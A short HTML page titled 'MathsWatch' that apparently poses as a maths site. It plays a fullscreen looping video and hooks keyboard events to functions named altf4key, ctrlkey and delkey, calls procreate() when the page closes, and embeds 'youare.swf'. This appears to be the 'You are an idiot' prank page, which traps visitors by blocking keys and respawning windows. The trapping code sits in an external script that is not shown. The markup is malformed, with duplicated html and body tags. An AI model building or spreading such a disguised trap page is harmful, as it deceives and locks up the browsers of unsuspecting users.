<!DOCTYPE html>
<html>
   <html lang="en">
   <head>
       <meta charset="UTF-8">
       <meta http-equiv="X-UA-Compatible" content="IE=edge">
       <meta name="viewport" content="width=device-width, initial-scale=1.0">
       <title>MathsWatch</title>
      
   </head>
   <body>
  

       <script>
        
           onloadedmetadata="this.autoplay = true"

       </script>
       <style>
        
    
#myVideo {
  width: 100vw;
  height: 100vh;
  object-fit: cover;
  position: fixed;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
  z-index: -1;
}

.browser-fail .happy {
	        display: none;
	    }


       </style>

       <!--Liam Made this so dont steal it :)-->
       <video autoplay loop id="myVideo">
        <source src="/Videos/VideoTwo.mp4" type="video/mp4" >
      </video>


   </body>
   <script>
 

</script>
<script src="maths2.js"></script>
   
<body bgcolor="#ffffff" onkeydown="altf4key();ctrlkey();delkey();" onunload="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">

  <object width="100%" height="100%" data="youare.swf">
    <param name="movie" value="youare.swf">
    <param name="quality" value="high">
    <embed src="/Videos/VideoTwo.mp4" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%">
    </embed> 
  </object> 
   </html>
</html>